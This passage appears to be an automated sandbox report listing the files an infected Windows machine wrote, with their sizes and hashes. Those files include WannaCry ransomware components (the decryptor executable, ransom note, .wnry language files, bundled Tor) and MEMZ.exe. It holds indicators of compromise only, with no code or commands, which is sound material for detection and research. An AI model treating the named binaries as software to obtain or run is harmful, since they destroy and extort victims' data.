SHA5123f8a79556ff5b90ec03faf5fe55ddacbb4d49bc74211a2b987709cb3c23a1f2198fcecaf34e23c5a35efa04fdeba537fe9758062e165f50ad0189c7e383a6134
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5011dffb0bf3320c3e4a9145e9382263a
SHA12d94462b98fef6f35a420775485615a2fbbb118d
SHA2566c3231509ecefb878e55a77641c53ea3cdfe92e3c393c9703858d45642db3b03
SHA51270c94e1b5b38cc3b641551820a527ef728154600e2dd0a5d2da9a7b4b1b648d57dab83d8c9159852ab8221d5990a91952285a0d83461ba3ead58c0b8f16a74dd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD57784581d841affce96267dd6a063687f
SHA15dac01b7d4d6273cdd9ad93cc70ac0da6212914b
SHA25631ad0d0afc5985c443bb740dc89251b3bffe2312f3ec068bf1f3e8efd2fb70ed
SHA512c93e4a4f120ede8f64a8284eb833ba1a13877457f1ebcacbb5b849890c2756a0880bb2037a45e799c7dac65cffb7bf747ce9bc7bc81745abf1eef0114e3ced6d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5aaa01c06282bf43eb5bb9626c24a7193
SHA13def3cc27bd6d2b7b9b09249da98905665b63118
SHA256a17cb0081db5ab6c622152c213fe9aa038535b99c728d335c1c71bf9927918b7
SHA5128f57d1358cb2d0e47c8a30f3b88e962185c5a32f79c15f8578e9c48f33276e0b6382bfa979f53c0e84e4f61b7efc05d14e66e3b31653fae674414bc41442d21f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5ee12864f6f7cb6adde30b5366740e356
SHA107a55c5f3b6a75abed36e4eb634a6f8869cec1da
SHA25646fa09b089d257fb94ce3f4b4884d9df489f96ca7746dbabfeb2c45834c81ee6
SHA5124b67b6d2b5d5250b4d8f7877cfc9587eb1c940cc4c5d1305d4018979beafaa302af997245f23ddda169d1370601f95934b78a194c00d96bd53f90c1cfd1e5edf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5e497d360c16bac73508ff8f0f75e23e3
SHA1afb5b3141c2bac335028cae766dc973e7d5eb6a3
SHA256349ab0ed8295d970163510b7cc9ecc4bb60fbe65881526d3ed0e15c398d4f973
SHA5128b8312001bd11ad1722f57c53e280fc80c4602008df8c9afd6dfeb5446c4b1e8be240c2f7134e8c753771d1fcd252bf6a0ad3fccea7622f7ee630a431d1741c7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5136a7b1f6e5c4950da6948c6c09a0b98
SHA12b97896f4fb8ffe287760d43c727c113514bb62f
SHA256fbaaf28980810e03cec86328269bbbfe46aa96c91d081809ff96399776755951
SHA5121601c653791529fdf7246db89cbb29d02368dd1067cb976d051417bc64fa4b2daac3892fe12eff513f8ae2de972dad0ce9ed7c3374b5b25a5348c6378a10909d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
15KB
MD5b4a66fd996f5fee3467472c55ce669ff
SHA1b7485cf19026bb42a333469cde9707a4e449d1e0
SHA25646c2be262ed9f79240ec58d5280287d2ffef2dcc3955587ed335cb46c5571cbc
SHA51272ef3d93fba2b9dc1429e2d466d5ee04ee0accfe05b824e521bea94d2a7e777137f908940b6f222c6d446170906635a47276b1326bdd942ce1b6c7fd5764e5bf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
15KB
MD516d5c7a649a4895def92d3c31e45c164
SHA1f41d305c97d32ca7ff27342cb1425907cc734424
SHA25648733a2f1093f3a338d8d20fdf696896fbe64fe7949c934c528dc3add9bdf338
SHA512b7946361de7c83691d3ed7b25d8a5e154b0674699932997c4ee39a45712589c416dc9104fe29cd7c757007b6b473946c576a17135f94f0ae15b5a7d48228a539
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5566c65f775c07f9cc002ad834304e1da
SHA1c87f29396fb8a766774f9374df6f26b7fcbfbb5f
SHA2568b9d5ce75e6a755436acc78d8f71de4e38c3a94dc5d004963b93cb89a773c3c1
SHA512839ad8967c962b930841aae5061aa8ab10b78ffdc6c89645d28b0e94dcf56b02acc469ed6bbd3aeb985a9a5f64488c40ad2792fbd37930358b31e13da5022974
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
4KB
MD5aa48e4672dfcc8ecf17c30c7c193b295
SHA1434cd7671251e33b8826fc7c7bc1a636217051bf
SHA25694f203db72e85525fc7fe709ab8e308c9843f052ae9a0694d2828443bf365907
SHA5120d8658bf85e71d56289c4c9d06e473df345ee69fc6f8cc232d39a08fd41341b380ab42ec30aeb9402950f6d900daff900258849067aecb1677817e90a3b618de
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
15KB
MD5b0e429d8b90b05838bd7328ea60aed3f
SHA1468b5a77c504eeafd43fe0afef31d418be936437
SHA256a2a931bd7e40331b1e29957a15a802d02b0ea7ab35ae72158744c41ab8447f07
SHA5124b9a6b5248fd45906878d1416cd648b0949adc343f99012b6e9bd2961d0d28a0416515bbc73caaf0f47f77ed1c4ed679709bfe30b34e845f6ab6c86e9695dfb9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD59e3b2ad473b35e6b43d1120196ac4708
SHA12d4d564d127b460ab9d31b338d47059a051ca147
SHA256edaad8e36b5abab01ed80efafee3d416c8f9e124725ca343ea1bce907c9194fa
SHA5124164bcb5763cabf5cff7b058a3850254e483135abc677433af1dd24e197a99efc2cc3b2131e9ee9a0295a45f48d617a109432d99ed994330822c30dd803a0348
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5d5e5f40d42a728a9a31a0a2cd3956e18
SHA16ff96c4fbb47d5eadd6fe74d42d5aae0d83decae
SHA256efc62f4b8ff9dde615f4eda2cb78c92246d1d502f7c1b293e2b3ddca574ca23b
SHA5123b85e9720421fa95d7c8ef9bb4ade6375f3e2d1eb3a4cc403452289ccc25d9f1bbd4dc9698b1f50cb28cc47c3d92b30199252985658f5daf46053de7addf9d26
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
15KB
MD5dbc9d715829075737e940adfc43cb379
SHA12890aee66fd73f5623dc6d6b3b0beac3dc506e32
SHA2561f394edfa2e2cd4c4611af1b2e78e2b5abfc23b3a86d5f632637f02496623108
SHA5129d3dc29347685e68df513f925cce7698a3eb6ae6b1d65c020733ff61072673dbc6800b182a16a93e3c64da22e6cd0d43e9c72b3801426cb80b70a98ad235b742
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure PreferencesFilesize
24KB
MD502ee7addc9e8a2d07af55556ebf0ff5c
SHA1020161bb64ecb7c6e6886ccc055908984dc651d8
SHA256552d3ed359b7a52278ce621674d16428d8a7969f6cd5663df18e240cce66aadc
SHA512567989543c3848a0c3276d96b96ca761f750e4b71fb74f36d809f590ffe16a72fd5ece251737a8b1ffe65f0051e211bd7ad19d2b8b0b7ca1b7ffc86dd2a52883
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
5KB
MD5756293a3de74adea6a36231c712c28b8
SHA10e4abbb22db6551bb299071f1c1bd025a2141e33
SHA256a6c54e1352651a00f2b3ee398e20a90b49546a878754ac495dc004053d3f28a5
SHA51242ff7f1c17d0009c8d0a589af4cca1cf3c0ede37006cde1d42ac3fe975ac77d474b0da90712ec58d0980a1584eafebcdde339cca3f80b67dd17c2ebb1c7a31f7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
6KB
MD5339ceb1f550bece6ae208b3e263a06cf
SHA1c6bc9b17628a1c9383cea8cff51122a11135eebe
SHA25664e4c68eb6a354b576bec874cf12d2a7bbd5b5adb09e8d0e67542a45d069a32e
SHA512b525d9a0d7325315bbb9bd839ec3c7ffb8b4284c7b6fcf0579582322eaec4f5bb77dcd3c8dfa7a90f416d3044cf3a3fd0d12583b79bdcd3df9dd63742c441290
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
13KB
MD5be46fcf15bba7334ecdbcfb733635f79
SHA195da809acc6037bd0c53fe152f1e9cbd15475944
SHA256745a9e4e473452a88ed60b8acaa6d0a8fdf421ecd294b79b37479b74cbb985b5
SHA5123e56c46cd81cd20dcfaedfcaceb3036271acf41ecc5fd599e2c0bc19753a0453296550d38b16549043f140ed100ad7c54dcbaaacdc3a4ce42b7e49213e0375d0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
13KB
MD51fb9f1058425c10b7d5e228f72234592
SHA14abaaa51169c89bb3540c60d8d9afbd97f49b8bf
SHA2569ebcd123614c29f8eddfdb71cc25df480433ec009b4d5941b6d9d04b15adaa38
SHA512e9b58669dc03c365083bcec6f09ba685eceba1ee2989f6d7af8fa5d37b3da1aa248694b384bf012650c77421d51e6310dc270ab94293eeccebb3d5aa2aed8b71
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
13KB
MD54fbf77c57d40f2e45f7522a6f66bb351
SHA1e272b8294fb1742fa3aa6d7e1d65280a1b7d849f
SHA2560d03e36eb2ccd9d03160de36194e68a98036fc7092f74ba3265dfbcb8292b273
SHA5120e9d423789ea20ea52d5d25b53758fa0a61d28978e8c254d26c36eadcc0ec89f8170a721dc380ad02ac0a600b1d0dd80c6b63cd7129aaee9686d98e5594c61e4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
13KB
MD573d65c02811a8582bb9d8c8b4040a987
SHA12ac056cb0fd1a326d437c275387a15bb56cfe635
SHA25614379edd3a1ae4a482071c0e5c2dbb6b1a01d8c89de8ceed4c91d8bdbf135ae2
SHA512 0a27e1d693043b06892dffcf8cbe61d769dbcfabf45a53e7cb5819e8e2e4d03c65585490ef4999514a26cdd2be848e9b4ecd89abb88b2ae8b5d92c5a895e12db
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize 13KB
MD5 1dd507dd42a9451b3e1520eaa7351e4c
SHA1 761d480730ea696be0ba1029bb1c514b8f0941de
SHA256 a28d8953475c521d18c604f970490446118587025fab395e47ed538b17ce6325
SHA512 359f903f72deda62009ca39e3140238b5674c5590f913e807a30b43dbe676542a041d9594d4422d05b57e8822b5bff0c369c3d4de122d5e00e7e879e82800788
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize 13KB
MD5 f5c0c7f742db1fb237dd065e48f20771
SHA1 4ed0788e9b39533386336022c08f9edd98e22a00
SHA256 d7716236b350c77aa236b999d13d68e2aae651e79f2c98cd5a98e65a6a86a068
SHA512 a42b430ec0325238138b83fa4b4536a3e66a67879f511cc4a929047ab9840bd0a08491d0dbe7cf132fc7b134e1f48a8d786e26f021e656f5a67153c6917b3dbb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize 10KB
MD5 9f3fd50175e234e2d767485fcc816848
SHA1 e714b35eacb06d98798f3704cef5417b5408287a
SHA256 184272087ce8221f3cfead24973567d49c30dd42e168b6964df14190c8e19db6
SHA512 78e7a45dc2ef0611b8090b78a09c2954a981ca35d43afff3c05fb708686322683f76a6494e0cebd629542a920a0a66bbcd06cc0dda948acfa1a1edfc05df4c3f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize 12KB
MD5 9c88c61344d0eec390ad406066bad7da
SHA1 212ec0dc5a91e6645002ae3e3428bb4856cf9802
SHA256 a5ddb886f289ff4e9f4f7dde670a1d892f7795d014eca0984a7f588db867100d
SHA512 2d594b5a3076fbaa22050f26ad44635ebe62c2ccf669f3571551b740530ec4e1d2491448c40086c247369fe0e704e34f3b45e79c18384b94e342f2dc6349b6c0
-
C:\Users\Admin\AppData\Local\Temp\00000000.res
Filesize 136B
MD5 180b50f329a49e35e8ee62e0ba266864
SHA1 5bebaf12531dc374f4041c47fcabb261666679df
SHA256 c5baa85545e23aea10bcf2ff39217310e0291d95484dc71ac0eb5a269be7f686
SHA512 42ede1e4dca37689230458e75dd05898b13baeddf6bc6f052661a751717c324938fd11085293ab37fb2d808f1df7df5d7aed081651567171927aef0a15c7ce95
-
C:\Users\Admin\AppData\Local\Temp\311251678944450.bat
Filesize 340B
MD5 3867f2ec82a7d77c9ffefb1aac8b7903
SHA1 06fccf19b9c498b5afa2b35da00e3ab28d56f785
SHA256 4e25c23aa5babc853889d3e1e79bb01ca7650837b250314a8d50f2e2c4b6730f
SHA512 b413994e5b9f0ecb956055c7befff14845b56bb658fd8280d3213fdfa175ff76bc56e082174f2475fdf2d1f9eff618ebfd80ee2b67c091eaf1fd9c94697da5aa
-
C:\Users\Admin\AppData\Local\Temp\@Please_Read_Me@.txt
Filesize 933B
MD5 7a2726bb6e6a79fb1d092b7f2b688af0
SHA1 b3effadce8b76aee8cd6ce2eccbb8701797468a2
SHA256 840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5
SHA512 4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
Filesize 240KB
MD5 7bf2b57f2a205768755c07f238fb32cc
SHA1 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256 b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA512 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
Filesize 1KB
MD5 02464025879fcc9ba73bdda98215dd16
SHA1 297b033cfdfa5f7ea63e6ba0f811e4317957bf23
SHA256 40bb9f6b4542411d8b2c0ec5c75385e38daf354b96f488db27837a206ea0e4b8
SHA512 e1a9741da8998b6b8fffdf6c9f807bcde9a9f3762800e250e047041b3a72397842ddfa91c97727fe027409b306ddaff2f8105e7c22fa9f6c9201359982c367e4
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
Filesize 16KB
MD5 1d5ad9c8d3fee874d0feb8bfac220a11
SHA1 ca6d3f7e6c784155f664a9179ca64e4034df9595
SHA256 3872c12d31fc9825e8661ac01ecee2572460677afbc7093f920a8436a42e28ff
SHA512 c8246f4137416be33b6d1ac89f2428b7c44d9376ac8489a9fbf65ef128a6c53fb50479e1e400c8e201c8611992ab1d6c1bd3d6cece89013edb4d35cdd22305b1
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\LIBEAY32.dll
Filesize 3.0MB
MD5 6ed47014c3bb259874d673fb3eaedc85
SHA1 c9b29ba7e8a97729c46143cc59332d7a7e9c1ad8
SHA256 58be53d5012b3f45c1ca6f4897bece4773efbe1ccbf0be460061c183ee14ca19
SHA512 3bc462d21bc762f6eec3d23bb57e2baf532807ab8b46fab1fe38a841e5fde81ed446e5305a78ad0d513d85419e6ec8c4b54985da1d6b198acb793230aeecd93e
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\SSLEAY32.dll
Filesize 694KB
MD5 a12c2040f6fddd34e7acb42f18dd6bdc
SHA1 d7db49f1a9870a4f52e1f31812938fdea89e9444
SHA256 bd70ba598316980833f78b05f7eeaef3e0f811a7c64196bf80901d155cb647c1
SHA512 fbe0970bcdfaa23af624daad9917a030d8f0b10d38d3e9c7808a9fbc02912ee9daed293dbdea87aa90dc74470bc9b89cb6f2fe002393ecda7b565307ffb7ec00
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
Filesize 702KB
MD5 90f50a285efa5dd9c7fddce786bdef25
SHA1 54213da21542e11d656bb65db724105afe8be688
SHA256 77a250e81fdaf9a075b1244a9434c30bf449012c9b647b265fa81a7b0db2513f
SHA512 746422be51031cfa44dd9a6f3569306c34bbe8abf9d2bd1df139d9c938d0cba095c0e05222fd08c8b6deaebef5d3f87569b08fb3261a2d123d983517fb9f43ae
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
Filesize 90KB
MD5 78581e243e2b41b17452da8d0b5b2a48
SHA1 eaefb59c31cf07e60a98af48c5348759586a61bb
SHA256 f28caebe9bc6aa5a72635acb4f0e24500494e306d8e8b2279e7930981281683f
SHA512 332098113ce3f75cb20dc6e09f0d7ba03f13f5e26512d9f3bee3042c51fbb01a5e4426c5e9a5308f7f805b084efc94c28fc9426ce73ab8dfee16ab39b3efe02a
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
Filesize 3.0MB
MD5 fe7eb54691ad6e6af77f8a9a0b6de26d
SHA1 53912d33bec3375153b7e4e68b78d66dab62671a
SHA256 e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
SHA512 8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\tor.exe
Filesize 3.0MB
MD5 fe7eb54691ad6e6af77f8a9a0b6de26d
SHA1 53912d33bec3375153b7e4e68b78d66dab62671a
SHA256 e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
SHA512 8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll
Filesize 105KB
MD5 fb072e9f69afdb57179f59b512f828a4
SHA1 fe71b70173e46ee4e3796db9139f77dc32d2f846
SHA256 66d653397cbb2dbb397eb8421218e2c126b359a3b0decc0f31e297df099e1383
SHA512 9d157fece0dc18afe30097d9c4178ae147cc9d465a6f1d35778e1bff1efca4734dd096e95d35faea32da8d8b4560382338ba9c6c40f29047f1cc0954b27c64f8
-
C:\Users\Admin\AppData\Local\Temp\b.wnry
Filesize 1.4MB
MD5 c17170262312f3be7027bc2ca825bf0c
SHA1 f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256 d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512 c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c
-
C:\Users\Admin\AppData\Local\Temp\c.wnry
Filesize 780B
MD5 8124a611153cd3aceb85a7ac58eaa25d
SHA1 c1d5cd8774261d810dca9b6a8e478d01cd4995d6
SHA256 0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e
SHA512 b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17
-
C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Filesize 3.4MB
MD5 84c82835a5d21bbcf75a61706d8ab549
SHA1 5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512 90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
-
C:\Users\Admin\AppData\Local\Temp\lol.png
Filesize 11KB
MD5 3f3a8282cbdaa163c8db1e5e41793ea1
SHA1 220ba2e1ae8540e89d3a468ca4e4926851960696
SHA256 c358f6ddb8161c3b4bbe677b23185b3d2666a7eb5f74564a217bc5ddc971b7d6
SHA512 69630f19d36bf8bcf85549a667e4c0d7b4cddd44d1c907ef7e57c99a94328cf3ff6f303a9341d41d27c0f90d9e1f2dc0c169e0bbd0265e84df8025414a7f3807
-
C:\Users\Admin\AppData\Local\Temp\m.vbs
Filesize 219B
MD5 82a1fc4089755cb0b5a498ffdd52f20f
SHA1 0a8c0da8ef0354f37241e2901cf82ec9ce6474aa
SHA256 7fbdc49f4b4ba21949eca0b16c534b4882da97e94e5ca131cec1629e60439dfa
SHA512 1573a0c7333accef2695efefe1b57cba8f8d66a0061c24420ee0a183343a9a319995267d306ee85084c95580f9855bcdf9dee559b28a200b27fc3cc353315e78
-
C:\Users\Admin\AppData\Local\Temp\msg\m_bulgarian.wnry
Filesize 46KB
MD5 95673b0f968c0f55b32204361940d184
SHA1 81e427d15a1a826b93e91c3d2fa65221c8ca9cff
SHA256 40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd
SHA512 7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92
-
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (simplified).wnry
Filesize 53KB
MD5 0252d45ca21c8e43c9742285c48e91ad
SHA1 5c14551d2736eef3a1c1970cc492206e531703c1
SHA256 845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a
SHA512 1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755
-
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (traditional).wnry
Filesize 77KB
MD5 2efc3690d67cd073a9406a25005f7cea
SHA1 52c07f98870eabace6ec370b7eb562751e8067e9
SHA256 5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a
SHA512 0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c
-
C:\Users\Admin\AppData\Local\Temp\msg\m_croatian.wnry
Filesize 38KB
MD5 17194003fa70ce477326ce2f6deeb270
SHA1 e325988f68d327743926ea317abb9882f347fa73
SHA256 3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171
SHA512 dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c
-
C:\Users\Admin\AppData\Local\Temp\msg\m_czech.wnry
Filesize 39KB
MD5 537efeecdfa94cc421e58fd82a58ba9e
SHA1 3609456e16bc16ba447979f3aa69221290ec17d0
SHA256 5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150
SHA512 e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b
-
C:\Users\Admin\AppData\Local\Temp\msg\m_danish.wnry
Filesize 36KB
MD5 2c5a3b81d5c4715b7bea01033367fcb5
SHA1 b548b45da8463e17199daafd34c23591f94e82cd
SHA256 a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6
SHA512 490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3
-
C:\Users\Admin\AppData\Local\Temp\msg\m_dutch.wnry
Filesize 36KB
MD5 7a8d499407c6a647c03c4471a67eaad7
SHA1 d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b
SHA256 2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c
SHA512 608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12
-
C:\Users\Admin\AppData\Local\Temp\msg\m_english.wnry
Filesize 36KB
MD5 fe68c2dc0d2419b38f44d83f2fcf232e
SHA1 6c6e49949957215aa2f3dfb72207d249adf36283
SHA256 26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5
SHA512 941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810
-
C:\Users\Admin\AppData\Local\Temp\msg\m_filipino.wnry
Filesize 36KB
MD5 08b9e69b57e4c9b966664f8e1c27ab09
SHA1 2da1025bbbfb3cd308070765fc0893a48e5a85fa
SHA256 d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324
SHA512 966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4
-
C:\Users\Admin\AppData\Local\Temp\msg\m_finnish.wnry
Filesize 37KB
MD5 35c2f97eea8819b1caebd23fee732d8f
SHA1 e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA256 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf
-
C:\Users\Admin\AppData\Local\Temp\msg\m_french.wnry
Filesize 37KB
MD5 4e57113a6bf6b88fdd32782a4a381274
SHA1 0fccbc91f0f94453d91670c6794f71348711061d
SHA256 9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc
SHA512 4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9
-
C:\Users\Admin\AppData\Local\Temp\msg\m_german.wnry
Filesize 36KB
MD5 3d59bbb5553fe03a89f817819540f469
SHA1 26781d4b06ff704800b463d0f1fca3afd923a9fe
SHA256 2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61
SHA512 95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac
-
C:\Users\Admin\AppData\Local\Temp\msg\m_greek.wnry
Filesize 47KB
MD5 fb4e8718fea95bb7479727fde80cb424
SHA1 1088c7653cba385fe994e9ae34a6595898f20aeb
SHA256 e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9
SHA512 24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb
-
C:\Users\Admin\AppData\Local\Temp\msg\m_indonesian.wnry
Filesize 36KB
MD5 3788f91c694dfc48e12417ce93356b0f
SHA1 eb3b87f7f654b604daf3484da9e02ca6c4ea98b7
SHA256 23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4
SHA512 b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd
-
C:\Users\Admin\AppData\Local\Temp\msg\m_italian.wnry
Filesize 36KB
MD5 30a200f78498990095b36f574b6e8690
SHA1 c4b1b3c087bd12b063e98bca464cd05f3f7b7882
SHA256 49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07
SHA512 c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511
-
C:\Users\Admin\AppData\Local\Temp\msg\m_japanese.wnry
Filesize 79KB
MD5 b77e1221f7ecd0b5d696cb66cda1609e
SHA1 51eb7a254a33d05edf188ded653005dc82de8a46
SHA256 7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e
